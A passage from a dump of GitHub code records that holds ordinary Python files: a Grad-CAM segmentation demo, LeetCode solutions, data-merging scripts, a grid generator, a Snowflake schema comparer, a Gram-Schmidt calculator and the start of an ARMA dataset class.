progress=False)\nmodel = model.eval()\n\nif torch.cuda.is_available():\n model = model.cuda()\n input_tensor = input_tensor.cuda()\n\noutput = model(input_tensor)\nprint(type(output), output.keys())\n\n\"\"\"\nThis package assumes the model will output a tensor. Here, instead, it's returning a dictionarty with the \"out\" and \"aux\" keys, \nwhere the actual result we care about is in \"out\". This is a common issue with custom networks, \nsometimes the model outputs a tuple, for example, and maybe you care only about one of it's outputs.\n\nTo solve this we're going to wrap the model first.\n\"\"\"\n\n\nclass SegmentationModelOutputWrapper(torch.nn.Module):\n def __init__(self, model):\n super(SegmentationModelOutputWrapper, self).__init__()\n self.model = model\n\n def forward(self, x):\n return self.model(x)[\"out\"]\n\n\nmodel = SegmentationModelOutputWrapper(model)\noutput = model(input_tensor)\nprint(output)\n# output_matrix = output.view(375, 500).detach().cpu().numpy()\noutput_set = output[:, 0, :, :]\noutput_set_matrix = output_set.view(375, 500).detach().cpu().numpy()\n\nnormalized_masks = torch.nn.functional.softmax(output, dim=1).cpu()\n# normalized_masks = normalized_masks[:, 0, :, :]\n# normalized_masks_matrix = normalized_masks.view(375, 500).detach().cpu().numpy()\n\n\nsem_classes = [\n '__background__', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus',\n 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike',\n 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor'\n]\nsem_class_to_idx = {cls: idx for (idx, cls) in enumerate(sem_classes)}\n\ncar_category = sem_class_to_idx[\"car\"]\n# xx = normalized_masks[0, :, :, :].argmax(axis=0)\ncar_mask = normalized_masks[0, :, :, :].argmax(axis=0).detach().cpu().numpy()\ncar_mask_uint8 = 255 * np.uint8(car_mask == car_category)\ncar_mask_float = np.float32(car_mask == car_category)\n\nboth_images = np.hstack((image, np.repeat(car_mask_uint8[:, :, None], 3, axis=-1)))\nImage.fromarray(both_images)\n\nplt.imshow(Image.fromarray(both_images))\nplt.show()\n\nfrom pytorch_grad_cam import GradCAM\n\n\nclass SemanticSegmentationTarget:\n def __init__(self, category, mask):\n self.category = category\n self.mask = torch.from_numpy(mask)\n if torch.cuda.is_available():\n self.mask = self.mask.cuda()\n\n def __call__(self, model_output):\n return (model_output[self.category, :, :] * self.mask).sum()\n\n\ntarget_layers = [model.model.backbone.layer4]\ntargets = [SemanticSegmentationTarget(car_category, car_mask_float)]\nwith GradCAM(model=model,\n target_layers=target_layers,\n use_cuda=torch.cuda.is_available()) as cam:\n grayscale_cam = cam(input_tensor=input_tensor,\n targets=targets)[0, :]\n cam_image = show_cam_on_image(rgb_img, grayscale_cam, use_rgb=True)\n\nImage.fromarray(cam_image)\nplt.imshow(Image.fromarray(cam_image))\nplt.show()\n","repo_name":"shahelaojieraozhi/DL_gogo","sub_path":"code_patch/pytorch-grad-cam-master/Semantic Segmentation.py","file_name":"Semantic Segmentation.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72750550866","text":"# -*- coding:utf-8 -*- \n\n\n'''\n43. Multiply Strings\nGiven two non-negative integers num1 and num2 represented as strings, return the product of num1 and num2.\nNote:\nThe length of both num1 and num2 is < 110.\nBoth num1 and num2 contains only digits 0-9.\nBoth num1 and num2 does not contain any leading zero.\nYou must not use any built-in BigInteger library or convert the inputs to integer directly.\n'''\nclass Solution(object):\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n ans = [0] * (len(num1) + len(num2))\n for i, n1 in enumerate(reversed(num1)):\n for j, n2 in enumerate(reversed(num2)):\n ans[i + j] += int(n1) * int(n2)\n ans[i + j + 1] += ans[i + j] / 10\n ans[i + j] %= 10\n while len(ans) > 1 and ans[-1] == 0:\n ans.pop()\n return \"\".join(map(str, ans[::-1]))\n\n\n'''\n46. Permutations\nGiven a collection of distinct numbers, return all possible permutations.\n\nFor example,\n[1,2,3] have the following permutations:\n[\n [1,2,3],\n [1,3,2],\n [2,1,3],\n [2,3,1],\n [3,1,2],\n [3,2,1]\n]\n'''\nclass Solution(object):\n def permute(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n result = []\n self.get_permute([], nums, result)\n return result\n\n def get_permute(self, current, num, result):\n if not num:\n result.append(current + [])\n return\n for i, v in enumerate(num):\n current.append(num[i])\n self.get_permute(current, num[:i] + num[i + 1:], result)\n current.pop()\n\n'''\na version via dfs\nclass Solution(object):\n def permute(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n res = []\n visited = set([])\n def dfs(nums, path, res, visited):\n if len(path) == len(nums):\n res.append(path + [])\n return\n \n for i in xrange(0, len(nums)):\n # if i > 0 and nums[i - 1] == nums[i]:\n # continue\n if i not in visited:\n visited.add(i)\n path.append(nums[i])\n dfs(nums, path, res, visited)\n path.pop()\n visited.discard(i)\n \n dfs(nums, [], res, visited)\n return res\n'''\n\n\n'''\n47. Permutations II\nGiven a collection of numbers that might contain duplicates, return all possible unique permutations.\nFor example,\n[1,1,2] have the following unique permutations:\n[\n [1,1,2],\n [1,2,1],\n [2,1,1]\n]\n\n'''\nclass Solution(object):\n def permuteUnique(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n result = []\n nums.sort()\n self.get_permute([], nums, result)\n return result\n\n def get_permute(self, current, num, result):\n if not num:\n result.append(current + [])\n return\n for i, v in enumerate(num):\n if i - 1 >= 0 and num[i] == num[i - 1]:\n continue\n current.append(num[i])\n self.get_permute(current, num[:i] + num[i + 1:], result)\n current.pop()\n\n'''\na dfs version\nclass Solution(object):\n def permuteUnique(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n res = []\n nums.sort()\n def dfs(nums, res, path, visited):\n if len(path) == len(nums):\n res.append(path + [])\n return\n \n for i in range(len(nums)):\n if i in visited:\n continue\n if i > 0 and nums[i] == nums[i - 1] and i - 1 not in visited:\n continue\n visited |= {i}\n path.append(nums[i])\n dfs(nums, res, path, visited)\n path.pop()\n visited -= {i}\n \n dfs(nums, res, [], set())\n return res\n'''","repo_name":"FelixSeptem/Practice","sub_path":"LeetCode/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74871872786","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\n\n# Import first data file.\n# Set timestamp column as the index.\n# Skip rows 1,2 because theyre useless.\n# Normalize date-time format.\ndf1 = pd.read_csv('wind_data.csv', index_col=0, skiprows=[1,2])\ndf1.index = pd.to_datetime(df1.index)\nprint(df1)\n\n# Import second data file.\ndf2 = pd.read_csv('powerstation.csv', parse_dates={'timestamp':[0,1]}, index_col=0)\nprint(df2)\n\n# Merge both data sets using an outer join.\n#\tNote: Change to 'inner' for an inner join.\ndf3 = pd.merge(df2, df1, left_index=True, right_index=True, how='outer')\nprint(df3)\n\n# Fill in all NaNs with 0s. \n# \tNote: Does not fill in \"empty\" cells.\ndf3.power_output = pd.to_numeric(df3.power_output, errors='coerce').fillna(0).astype(np.float64)\ndf3.Ts_Avg = pd.to_numeric(df3.Ts_Avg, errors='coerce').fillna(0).astype(np.float64)\ndf3.wnd_dir_compass = pd.to_numeric(df3.wnd_dir_compass, errors='coerce').fillna(0).astype(np.float64)\ndf3.wnd_spd = pd.to_numeric(df3.wnd_spd, errors='coerce').fillna(0).astype(np.float64)\n\n# Export merged dataset to csv.\ndf3.to_csv('total.csv')\n\n# Normalize data using sklearn library\nx = df3.values\nmin_max_scaler = preprocessing.MinMaxScaler()\nx_scaled = min_max_scaler.fit_transform(x)\ndf4 = pd.DataFrame(x_scaled)\n\ndf4.plot()\nplt.show()\n\n######## PROBABLY USELESS STUFF ##############\n# df3.plot(x=df3.index, y=[\"power_output\", \"Ts_Avg\", \"wnd_dir_compass\", \"wnd_spd\"])\n# df3.plot(x=df3.index, y=\"power_output\")\n# df3.plot(x=df3.index, y=\"Ts_Avg\")\n# df3.plot(x=df3.index, y= \"wnd_dir_compass\")\n# df3.plot(x=df3.index, y=\"wnd_spd\")\n# plt.savefig('figure.png')","repo_name":"brandonsayers/MicrogridPrediction","sub_path":"DataProcessingShtuff/processDataPanda.py","file_name":"processDataPanda.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72975021586","text":"import sys\nimport time\n\nsys.path.append(\"..\")\nfrom AxoController import AxoController # noqa: E402\n\n\ndef main():\n port = \"COM3\"\n axo_ctrl = AxoController(port=port, angle_telorance=[20, 60, 80, 5])\n # axo_ctrl.close_receive_info()\n # axo_ctrl.enter_control_mode()\n\n # axo_ctrl.set_all_motors_pos_sync([10, 0, 10, 0])\n\n # axo_ctrl.set_all_motors_pos_sync([40, -30, 40, -30])\n\n # axo_ctrl.exit_control_mode()\n # time.sleep(10)\n start_t = time.sleep(100)\n # for i in range(15):\n # axo_ctrl.change_control_mode(\"position\")\n # axo_ctrl.set_all_motors_pos_async([0, 0, 0, 0])\n\n # print(f\"change control mode time is {time.time() - start_t}\")\n axo_ctrl.close_controller()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Beanpow/AxoController","sub_path":"src/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7726208336","text":"def encode(message):\n encoded=\"\"\n i=0\n while(i<len(message)):\n count=1\n ch=message[i]\n j=i\n while(j<len(message)-1):\n if(message[j]==message[j+1]):\n count=count+1\n j=j+1\n else:\n break\n encoded+=str(count)+ch\n i=j+1\n return encoded \n #Remove pass and write your logic here\n\n#Provide different values for message and test your program\nencoded_message=encode(\"ABBBBCCCCCCCCAB\")\nprint(encoded_message)\n","repo_name":"SreehariKarthikeyan/Infosys-Python-Exercises","sub_path":"Assignment Set - 3-Strings-Encoded.py","file_name":"Assignment Set - 3-Strings-Encoded.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13300235494","text":"from datetime import datetime\n\nSTARTING_TIME = datetime(2022, 3, 18, 8, 0, 0)\nSTARTING_DATE_STR = '2022-03-18'\n\n\ndef return_time_info():\n \"\"\"Returns time information\n\n This is code for the command line interface to validate user input and return a time in seconds to be used to report on the package deliveries\n\n Args:\n N/A: This function takes no arguments\n\n Returns:\n time_difference.total_seconds(): This function returns a singular argument that represents the total\n time difference between the user input time and the delivery start time\n\n Raises:\n N/A: This function raises no errors/has no error checking\n\n Time complexity: Because return_time_info has no loops, it's time complexity is O(1)\n Space complexity: Because a tuple and a few variables are utilized the space complexity is O(n)\n \"\"\"\n while True:\n time = input(\n \"Enter a time after 08:00:00 but before 17:00:00 (in military time, i.e., 0900) to check package status \"\n \"or 'X' to exit: \")\n\n if time.upper() == 'X':\n break\n elif len(time) != 4 or not time.isdigit() or int(time) < 800 or int(time) > 1700:\n continue\n\n dt_tuple = tuple([int(x) for x in STARTING_DATE_STR.split('-')]) + tuple([int(time[:2])]) + tuple(\n [int(time[2:])])\n dt_obj = datetime(*dt_tuple)\n time_difference = dt_obj - STARTING_TIME\n\n if dt_obj > STARTING_TIME:\n return time_difference.total_seconds()\n","repo_name":"alexhenson/Automated-Package-Delivery","sub_path":"libraries/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28399200036","text":"import geopandas as gpd\nfrom shapely.geometry import Polygon\n\nimport src.utils.settings as settings\n\n\nclass GridGenerator:\n def __init__(self,\n bounding_box,\n epsg_code):\n \"\"\"\n | Constructor method\n\n :param (int, int, int, int) bounding_box: bounding box (x_1, y_1, x_2, y_2)\n :param int epsg_code: epsg code of the coordinate reference system\n :returns: None\n :rtype: None\n \"\"\"\n self.bounding_box = bounding_box\n self.epsg_code = epsg_code\n\n def get_coordinates(self, tile_size_meters):\n \"\"\"\n | Returns the coordinates of the top left corner of each tile in the area of the bounding box.\n The bounding box is quantized to the image size in meters.\n\n :param int tile_size_meters: tile size in meters\n :returns: coordinates (x, y) of each tile\n :rtype: list[(int, int)]\n \"\"\"\n coordinates = []\n\n bounding_box = (self.bounding_box[0] - (self.bounding_box[0] % settings.IMAGE_SIZE_METERS),\n self.bounding_box[1] - (self.bounding_box[1] % settings.IMAGE_SIZE_METERS),\n self.bounding_box[2],\n self.bounding_box[3])\n\n columns = (bounding_box[2] - bounding_box[0]) // tile_size_meters\n if (bounding_box[2] - bounding_box[0]) % tile_size_meters:\n columns += 1\n\n rows = (bounding_box[3] - bounding_box[1]) // tile_size_meters\n if (bounding_box[3] - bounding_box[1]) % tile_size_meters:\n rows += 1\n\n for row in range(rows):\n for column in range(columns):\n coordinates.append((bounding_box[0] + column * tile_size_meters,\n bounding_box[1] + (row + 1) * tile_size_meters))\n\n return coordinates\n\n @staticmethod\n def get_bounding_box(coordinates, tile_size_meters):\n \"\"\"\n | Returns the bounding box of a tile given its coordinates of the top left corner.\n\n :param (int, int) coordinates: coordinates (x, y)\n :param int tile_size_meters: tile size in meters\n :returns: bounding box (x_1, y_1, x_2, y_2)\n :rtype: (int, int, int, int)\n \"\"\"\n bounding_box = (coordinates[0],\n coordinates[1] - tile_size_meters,\n coordinates[0] + tile_size_meters,\n coordinates[1])\n return bounding_box\n\n @staticmethod\n def get_polygon(coordinates, tile_size_meters):\n \"\"\"\n | Returns the polygon of a tile given its coordinates of the top left corner.\n\n :param (int, int) coordinates: coordinates (x, y)\n :param int tile_size_meters: tile size in meters\n :returns: polygon\n :rtype: Polygon\n \"\"\"\n bounding_box = GridGenerator.get_bounding_box(coordinates=coordinates,\n tile_size_meters=tile_size_meters)\n polygon = Polygon([[bounding_box[0], bounding_box[1]],\n [bounding_box[2], bounding_box[1]],\n [bounding_box[2], bounding_box[3]],\n [bounding_box[0], bounding_box[3]]])\n return polygon\n\n def get_grid(self, tile_size_meters):\n \"\"\"\n | Returns a geodataframe of the grid.\n\n :param int tile_size_meters: tile size in meters\n :returns: geodataframe\n :rtype: gpd.GeoDataFrame\n \"\"\"\n coordinates = self.get_coordinates(tile_size_meters=tile_size_meters)\n\n polygons = []\n\n for coordinates_element in coordinates:\n polygon = self.get_polygon(coordinates=coordinates_element,\n tile_size_meters=tile_size_meters)\n polygons.append(polygon)\n\n gdf = gpd.GeoDataFrame(geometry=polygons, crs=f'EPSG:{self.epsg_code}')\n return gdf\n","repo_name":"mrsmrynk/adois","sub_path":"src/utils/grid_generator.py","file_name":"grid_generator.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"18173926380","text":"import os\nimport json\nfrom os.path import expanduser\nimport yaml\nimport snowflake.connector as sfconn\nfrom yaml.loader import FullLoader\n\nfrom snowbim.utilities import common\n\n\ndef connect(profile_dir:str=None, profile:str=None, target:str=None, db:str=None, schema:str=None):\n '''\n Use dbt profiles.yml to connect snowflake database\n Returns a tuple (code, snowflake connection, message)\n '''\n conn = {}\n\n profile_path = ''\n if not profile_dir:\n profile_path = f'{expanduser(\"~\")}/.dbt/profiles.yml'\n else:\n profile_path = f'{profile_dir}/profiles.yml'\n print(f'dbt profile was found at: {profile_path}')\n\n with open(profile_path, 'r') as stream:\n try:\n cred = yaml.load(stream, Loader=FullLoader)\n except yaml.YAMLError as e:\n return (-1, {}, str(e))\n\n if profile is None:\n cred = cred[next(iter(cred))]\n else:\n cred = cred[profile]\n\n cred = cred['outputs']\n if target is None:\n cred = cred[next(iter(cred))]\n else:\n cred = cred[target]\n\n if cred is None or cred['type'] != 'snowflake':\n return (-1, {}, f'Snowflake config not found: project={str(profile)}, target={str(target)} within profile: {profile_path}')\n\n # cred = {'type': 'snowflake', 'account': 'xxx', 'user': 'xxx', 'password': 'xxx', 'role': 'xxx', 'database': 'xxx', 'warehouse': 'xxx', 'schema': 'xxx'}\n conn = sfconn.connect(\n user = cred['user'],\n password = cred['password'],\n account = cred['account'],\n warehouse = cred['warehouse'] or 'COMPUTE_WH',\n database = db or cred['database'] or 'DEMO_DB',\n schema = schema or cred['schema'] or 'PUBLIC',\n role = cred['role'] or 'PUBLIC'\n )\n \n return (0, conn, None)\n\n\ndef compare_schema(snowflake_conn, bim_path:str=None, mode:str='directQuery', tables:list=[], exclude_tables:list=[], replace_partition:bool=False):\n '''\n Get the changes of snowflake database schema\n Currently support only for\n changes = { \"model\": { \"tables\": [ { \"columns\": [...] }, {...} ] } }\n Returns a tuple (code, changes, message)\n '''\n # Input bim data\n in_schema = {}\n if bim_path and os.path.exists(bim_path):\n with open(bim_path, 'r') as f:\n in_schema = json.load(f)\n in_schema = in_schema['model']['tables']\n\n # SF bim data\n snowflake_schema = []\n cur = snowflake_conn.cursor()\n\n filterred_tables_string = \"1 = 1\"\n filterred_exctables_string = \"1 = 1\"\n if tables and len(tables) > 0:\n filterred_tables_string = ','.join(tables)\n filterred_tables_string = filterred_tables_string.replace(',',\"','\")\n filterred_tables_string = f\"\\\"TABLE_NAME\\\" IN ('{filterred_tables_string}')\"\n if exclude_tables and len(exclude_tables) > 0:\n filterred_exctables_string = ','.join(exclude_tables)\n filterred_exctables_string = filterred_exctables_string.replace(',',\"','\")\n filterred_exctables_string = f\"\\\"TABLE_NAME\\\" NOT IN ('{filterred_exctables_string}')\"\n\n cur.execute(f'''\n SELECT \"TABLE_NAME\",\n \"TABLE_TYPE\"\n FROM \"INFORMATION_SCHEMA\".\"TABLES\"\n WHERE \"TABLE_SCHEMA\" = \\'{snowflake_conn.schema}\\'\n AND {filterred_tables_string}\n AND {filterred_exctables_string}\n ORDER BY \"TABLE_SCHEMA\", \"TABLE_NAME\"\n ''')\n df_tables = cur.fetch_pandas_all()\n\n cur.execute(f'''\n SELECT \"TABLE_SCHEMA\",\n \"TABLE_NAME\",\n \"COLUMN_NAME\",\n \"DATA_TYPE\"\n FROM \"INFORMATION_SCHEMA\".\"COLUMNS\" \n WHERE \"TABLE_SCHEMA\" = \\'{snowflake_conn.schema}\\' \n AND {filterred_tables_string}\n AND {filterred_exctables_string}\n ORDER BY \"TABLE_SCHEMA\", \"TABLE_NAME\", \"COLUMN_NAME\"\n ''')\n df_columns = cur.fetch_pandas_all()\n \n for index, item in df_tables.iterrows():\n table_item = {\n \"name\": item['TABLE_NAME'],\n \"is_new\": 1,\n \"columns\": [],\n \"partitions\": [\n {\n \"name\": f\"{item['TABLE_NAME']} Partition\",\n \"is_new\": 1,\n \"mode\": mode,\n \"source\": {\n \"type\": \"m\",\n \"expression\": [\n f\"let\",\n f\" Source = Snowflake.Databases(\\\"{snowflake_conn.account}.snowflakecomputing.com\\\", \\\"{snowflake_conn.warehouse}\\\", [Role=\\\"{snowflake_conn.role}\\\", CreateNavigationProperties=null, ConnectionTimeout=null, CommandTimeout=null]),\",\n f\" {snowflake_conn.database}_Database = Source{{[Name=\\\"{snowflake_conn.database}\\\",Kind=\\\"Database\\\"]}}[Data],\",\n f\" {snowflake_conn.schema}_Schema = {snowflake_conn.database}_Database{{[Name=\\\"{snowflake_conn.schema}\\\",Kind=\\\"Schema\\\"]}}[Data],\",\n f\" #\\\"{item['TABLE_NAME']}_{item['TABLE_TYPE'].title()}\\\" = {snowflake_conn.schema}_Schema{{[Name=\\\"{item['TABLE_NAME']}\\\",Kind=\\\"{item['TABLE_TYPE'].title()}\\\"]}}[Data]\",\n f\"in\",\n f\" #\\\"{item['TABLE_NAME']}_{item['TABLE_TYPE'].title()}\\\"\"\n ]\n }\n }\n ]\n }\n\n df_filterred_columns = df_columns.loc[df_columns['TABLE_NAME'] == item['TABLE_NAME']]\n for index, citem in df_filterred_columns.iterrows():\n table_item['columns'].append({\n \"name\": citem['COLUMN_NAME'],\n \"is_new\": 1,\n \"dataType\": citem['DATA_TYPE'],\n \"sourceColumn\": citem['COLUMN_NAME']\n })\n snowflake_schema.append(table_item)\n \n # Detect changes\n changes = { \"model\": { \"tables\": [ ] } }\n for sftable in snowflake_schema:\n in_table = [x for x in in_schema if x['name'] == sftable['name']]\n if in_table:\n # existing table\n in_table = in_table[0]\n\n table = {}\n table['name'] = in_table['name']\n table['is_new'] = 0\n\n # columns\n table['columns'] = []\n for sfcolumn in sftable['columns']:\n in_column = [x for x in in_table['columns'] if x['name'] == sfcolumn['name']]\n if in_column:\n # existing column\n in_column = in_column[0]\n sf_model_type = common.get_model_datatype(sfcolumn['dataType'])\n if (in_column['dataType'] != sf_model_type or in_column['sourceColumn'] != sfcolumn['sourceColumn']):\n in_column['dataType'] = sf_model_type\n in_column['sourceColumn'] = sfcolumn['sourceColumn']\n in_column['is_new'] = 0\n\n table['columns'].append(in_column)\n else:\n # new column\n sfcolumn['dataType'] = common.get_model_datatype(sfcolumn['dataType'])\n table['columns'].append(sfcolumn)\n\n # partitions\n table['partitions'] = []\n if replace_partition:\n table['partitions'] = sftable['partitions']\n else:\n for sfpartition in sftable['partitions']:\n in_partition = [\n x for x in in_table['partitions']\n if len(set(x['source']['expression']).intersection(sfpartition['source']['expression'])) == len(x['source']['expression'])\n and x['source']['type'] == sfpartition['source']['type']\n and x['mode'] == sfpartition['mode']\n ]\n if in_partition:\n # existing partition\n pass\n else:\n # new partition\n table['partitions'].append(sfpartition)\n\n if len(table['columns']) > 0 or len(table['partitions']) > 0:\n changes['model']['tables'].append(table)\n else:\n # new table\n for sfcolumn in sftable['columns']:\n sfcolumn['dataType'] = common.get_model_datatype(sfcolumn['dataType'])\n changes['model']['tables'].append(sftable)\n \n return (0, changes, None)","repo_name":"datnguye/snowbim","sub_path":"snowbim/engines/snowengine.py","file_name":"snowengine.py","file_ext":"py","file_size_in_byte":8487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28470277839","text":"import numpy as np\r\nclass GSOExp:\r\n exp1=\"\"\r\n exp2=\"\"\r\n exp3=\"\"\r\n exp4=\"\"\r\n exp5=\"\"\r\n e1 = \"\"\r\n e2 = \"\"\r\n e3 = \"\"\r\n e4 = \"\"\r\n e5 = \"\"\r\n\r\n def __init__(self, Vec, Dim, Vec1, Vec2, Vec3, Vec4, Vec5):\r\n self.Vsize = Vec\r\n self.DIM = Dim\r\n self.V1 = Vec1\r\n self.V2 = Vec2\r\n self.V3 = Vec3\r\n self.V4 = Vec4\r\n self.V5 = Vec5\r\n np.set_printoptions(precision=3)\r\n\r\n def __del__(self):\r\n class_name=self.__class__.__name__\r\n\r\n def MatBrkt(self, arr):\r\n return str(np.round(arr,3)).replace('[[', '[').replace(']]', ']')\r\n \r\n\r\n def GSOcalc(self):\r\n u1 = np.array(self.V1).reshape(1, self.DIM)\r\n GSOExp.e1 = u1 / np.linalg.norm(u1)\r\n GSOExp.exp1 = \"V1 = \"+self.MatBrkt(u1)+\"\\tu1 = \"+self.MatBrkt(u1)\r\n exp = GSOExp.exp1\r\n if self.Vsize>=2:\r\n V2 = np.array(self.V2).reshape(1, self.DIM)\r\n V2e1 = np.sum(V2*GSOExp.e1)\r\n u2 = V2 - V2e1*GSOExp.e1\r\n GSOExp.e2 = u2 / np.linalg.norm(u2)\r\n GSOExp.exp2 = \"V2 = \"+self.MatBrkt(V2)+\"\\t<V2,e1> = \"+str(round(V2e1,3))+\"\\nu2 = V2 - <V2,e1>e1 \\nu2 = \"+self.MatBrkt(u2)\r\n exp = GSOExp.exp2\r\n if self.Vsize>=3:\r\n V3 = np.array(self.V3).reshape(1, self.DIM)\r\n V3e1 = np.sum(V3*GSOExp.e1)\r\n V3e2 = np.sum(V3*GSOExp.e2)\r\n u3 = V3 - V3e2*GSOExp.e2 - V3e1*GSOExp.e1\r\n GSOExp.e3 = u3 / np.linalg.norm(u3)\r\n GSOExp.exp3 = \"V3 = \"+self.MatBrkt(V3)+\"\\n<V3,e2> = \"+str(round(V3e2,3))+\"\\t\\t<V3,e1> = \"+str(round(V3e1,3))+\"\\nu3 = V3 - <V3,e2>e2 - <V3,e1>e1\\nu3 = \" +self.MatBrkt(u3)\r\n exp = GSOExp.exp3\r\n if self.Vsize>=4:\r\n V4 = np.array(self.V4).reshape(1, self.DIM)\r\n V4e1 = np.sum(V4*GSOExp.e1)\r\n V4e2 = np.sum(V4*GSOExp.e2)\r\n V4e3 = np.sum(V4*GSOExp.e3)\r\n u4 = V4 - V4e3*GSOExp.e3 - V4e2*GSOExp.e2 - V4e1*GSOExp.e1\r\n GSOExp.e4 = u4 / np.linalg.norm(u4)\r\n GSOExp.exp4 = \"V4 = \"+self.MatBrkt(V4)+\"\\t<V4,e3> = \"+str(round(V4e3,3))+\"\\n<V4,e2> = \"+str(round(V4e2,3))+\"\\t\\t<V4e1> = \"+str(round(V4e1,3))+\"\\nu4 = V4 - <V4,e3>e3 - <V4,e2>e2 - <V4,e1>e1\\nu4 = \"+self.MatBrkt(u4)\r\n exp = GSOExp.exp4\r\n if self.Vsize == 5:\r\n V5 = np.array(self.V5).reshape(1, self.DIM)\r\n V5e1 = np.sum(V5*GSOExp.e1)\r\n V5e2 = np.sum(V5*GSOExp.e2)\r\n V5e3 = np.sum(V5*GSOExp.e3)\r\n V5e4 = np.sum(V5*GSOExp.e4)\r\n u5 = V5 - V5e4*GSOExp.e4 - V5e3*GSOExp.e3 - V5e2*GSOExp.e2 - V5e1*GSOExp.e1\r\n GSOExp.e5 = u5 / np.linalg.norm(u5)\r\n GSOExp.exp5 = \"V5 = \"+self.MatBrkt(V5)+\"\\n<V5,e4> = \"+str(round(V5e4,3))+\"\\t\\t<V5e3> = \"+str(round(V5e3,3))+\"\\n<V5e2> = \"+str(round(V5e2,3))+\"\\t\\t<V5e1> = \"+str(round(V5e1,3))+\"\\nu5 = V5 - <V5,e4>e4 - <V5,e3>e3 - \\n <V5,e2>e2 - <V5,e1>e1\\nu5 = \"+self.MatBrkt(u5)\r\n exp = GSOExp.exp5\r\n \r\n def U1(self):\r\n self.GSOcalc()\r\n return GSOExp.exp1\r\n def U2(self):\r\n self.GSOcalc()\r\n return GSOExp.exp2\r\n def U3(self):\r\n self.GSOcalc()\r\n return GSOExp.exp3\r\n def U4(self):\r\n self.GSOcalc()\r\n return GSOExp.exp4\r\n def U5(self):\r\n self.GSOcalc()\r\n return GSOExp.exp5\r\n \r\n def E1(self):\r\n self.GSOcalc()\r\n return \"e1 = \"+self.MatBrkt(GSOExp.e1)\r\n def E2(self):\r\n self.GSOcalc()\r\n return \"e2 = \"+self.MatBrkt(GSOExp.e2)\r\n def E3(self):\r\n self.GSOcalc()\r\n return \"e3 = \"+self.MatBrkt(GSOExp.e3)\r\n def E4(self):\r\n self.GSOcalc()\r\n return \"e4 = \"+self.MatBrkt(GSOExp.e4)\r\n def E5(self):\r\n self.GSOcalc()\r\n return \"e5 = \"+self.MatBrkt(GSOExp.e5)\r\n \r\n ","repo_name":"JunHong-1998/Tkinter-MCG-Calculator","sub_path":"GSOExp.py","file_name":"GSOExp.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33554662980","text":"def validCard(cardNumber):\n count = 0\n digitCount = 0\n prev = '#'\n repeat = 0\n \n if cardNumber[0] not in ['4','5','6']:\n return \"Invalid\"\n \n for i in range(len(cardNumber)):\n if cardNumber[i] == '-':\n if count % 4 != 0 or cardNumber[i-1] == '-':\n return \"Invalid\"\n count = 0\n \n elif cardNumber[i].isnumeric():\n digitCount+=1\n count+=1\n \n if prev == cardNumber[i]:\n if repeat == 3:\n return \"Invalid\"\n repeat+=1\n else:\n prev = cardNumber[i]\n repeat = 1\n \n else:\n return \"Invalid\"\n \n if digitCount > 16:\n return \"Invalid\"\n\n if digitCount == 16:\n return \"Valid\"\n return \"Invalid\"\n\nif __name__ == '__main__':\n \n for _ in range(int(input())):\n cardNumber = input()\n \n print (validCard(cardNumber))","repo_name":"ashishgopalhattimare/Python3-Course","sub_path":"Competitve Codes/validCardNumber.py","file_name":"validCardNumber.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42168529871","text":"import numpy as np\nimport os\nimport pickle as pkl\nimport torch as th\n\nfrom .dataset import DataModule\n\ntry:\n from statsmodels.tsa.arima_process import ArmaProcess\nexcept ImportError:\n ArmaProcess = None\n\n\nfile_dir = os.path.dirname(__file__)\n\n\nclass Arma(DataModule):\n \"\"\"\n Arma dataset.\n\n Args:\n times (int): Length of each time series. Default to 50\n features (int): Number of features in each time series. Default to 50\n ar (list): Coefficient for autoregressive lag polynomial, including\n zero lag. If ``None``, use default values. Default to ``None``\n ma (list): Coefficient for moving-average lag polynomial, including\n zero lag. If ``None``, use default values. Default to ``None``\n data_dir (str): Where to download files.\n batch_size (int): Batch size. Default to 32\n n_folds (int): Number of folds for cross validation. If ``None``,\n the dataset is only split once between train and val using\n ``prop_val``. Default to ``None``\n fold (int): Index of the fold to use with cross-validation.\n Ignored if n_folds is None. Default to ``None``\n prop_val (float): Proportion of validation. Default to .2\n num_workers (int): Number of workers for the loaders. Default to 0\n seed (int): For the random split. Default to 42\n\n References:\n #. `Explaining Time Series Predictions with Dynamic Masks <https://arxiv.org/abs/2106.05303>`_\n #. https://www.statsmodels.org/dev/generated/statsmodels.tsa.arima_process.ArmaProcess.html\n\n 